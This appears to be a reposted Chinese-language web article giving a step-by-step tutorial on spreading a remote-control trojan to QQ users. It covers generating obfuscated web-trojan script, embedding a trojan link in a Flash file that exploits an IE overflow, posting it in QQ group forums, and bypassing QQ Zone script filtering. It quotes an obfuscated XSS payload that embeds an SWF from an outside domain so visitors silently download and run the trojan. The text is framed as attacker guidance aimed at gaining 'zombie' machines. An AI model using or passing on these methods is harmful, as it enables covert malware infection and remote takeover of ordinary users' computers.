QQ木马怎么做（QQ挂马方法大揭密）

大家好，小太来为大家解答以上问题。QQ木马怎么做，QQ挂马方法大揭密这个很多人还不知道，现在让我们一起来看看吧！

每天使用QQ的在线用户不计其数。大家经常关注QQ尾病毒、QQ木马等攻击，却很少有人注意到，在我们经常访问的QQ群、QQ空间中，隐藏着更大的安全隐患，其隐蔽性和危害性远远大于QQ尾病毒、QQ木马。今天我们就来看看攻击者是如何将网页木马挂在QQ群和QQ空间攻击浏览用户的！

第一，干脆在QQ群里挂个木马

在一个流行的QQ群里挂一个网页木马，肯定很容易就能获得很多肉鸡。如何在QQ群里挂马？是群里发木马的网站吗？现在不会有人这样上当了。我们要做的就是在群里发一个被篡改的帖子。

步骤：制作网页木马。

在攻击之前，首先要做一个木马网页。这里笔者用的是“上星遥控木马V2006”，功能非常强大，之前笔者已经做了介绍。利用上星生成木马服务器程序“muma.exe”后，将服务器上传到一个网站，假设地址是"http://www.binghewu.com.cn/muma.exe"。

打开“南域孟建网页木马生成器”，在中间URL填写木马的链接地址，点击“生成”按钮，在生成器当前目录下生成一个名为“script.txt”的文件(如图1)。用记事本打开刚生成的“script.txt”文件，可以看到木马代码，是加密的。普通人很难看出这是网页的木马代码(如图2)。复制所有代码，然后将代码插入任何一个正常的网页，就可以得到一个网页木马。

提示：将木马代码插入正常网页，其位置一般在“”标记的中间。

图1使用木马生成器生成木马代码

图2加密的木马代码…

步骤2:3360制作SWF木马

以前的QQ群，只需要发一个有图的帖子，就可以达到挂马的目的。但是现在QQ群改版了，多了一个挂马的步骤，我们还需要把网页木马嵌入到Flash文件中。

打开“icode转SWF”，在“SWF文件”中浏览选择一个普通的Flash文件；在“插入代码”中填入刚才和现在网页木马的链接地址(如图3)。然后点击“替我插入”按钮，将网页木马链接插入到正常Flash文件中。SWF木马插入工具生成的Flash文件利用了一个IE漏洞。对方打开Flash文件，会造成IE溢出，自动访问木马网页，在后台下载运行木马程序。

图3生成SWF特洛伊木马

第三步：QQ群3360挂马

先把刚生成的SWF木马文件上传到某个空间，然后打开某个QQ群的BBS专栏，点击“发表新文章”。在新文章写作页面点击“插入Flash”按钮，输入SWF木马文件的网络链接地址和长度宽度，然后点击后面的小挂钩按钮，插入Flash文件(如图4)。新文章发布后，有人在QQ群里打开，就会自动播放Flash，下载到后台运行上星木马服务器。

图4在QQ群发布Flash木马

提示：当然，我们也可以直接在QQ群里传播SWF木马文件的网址，别人点击后就会打木马。但这种方式不如发表文章隐蔽有效，攻击持续性不强。

二、QQ空间玩挂马

自腾讯推出QQ-zone以来，各种跨站漏洞不断被曝光。虽然腾讯对QQ-zone进行了全面的更新，禁止了自定义脚本的运行，但是通过我们的测试发现，限制非常简单，只要改变角色就可以突破限制，在QQ空间随意挂马。

方法：挂起Flash木马

打开QQ空间后，点击页面上的“自定义”按钮，然后在弹出的工具栏上点击“个性设置”“新建模块”命令。也可以直接在QQ空间页面按组合键打开自定义对话框。在弹出的网页对话框中输入任意“模块名称”，点击“提交”按钮，弹出创建成功的提示框。然后，添加内容对话框将出现，并删除“网址”和“图片”中的“http://”，并留下“链接名称”空白。在“Comment”中输入下面的代码(如图5所示):

以下是引用片段：“img src='javascri#112t:document.getelementbyid('mlogo')。#105;nnerHTML='divstyle=\'position:absolute；top:0左：0；\'EMBEDsrc=\'http://www.bingheWu.com.cn/muma.swf\'quality=highwmode=\'transparent\'WIDTH=\'925\'HEIGHT=\'655\'TYPE=\'application/x-shockwave-flash\'/div'；'"

代码中的Flash地址“http://www.binghewu.com.cn/muma.swf”是刚刚制作并上传的SWF木马的链接地址，可以更改为Flash木马文件的任何其他地址。提交代码后，用户进入这个QQ空间，会自动打开显示上传的SWF木马Flash，以便在后台下载运行上星木马服务器程序。

本文到此结束，希望对大家有所帮助。

标签：

免责声明：本文为转载，非本网原创内容，不代表本网观点。其原创性以及文中陈述文字和内容未经本站证实，对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺，请读者仅作参考，并请自行核实相关内容。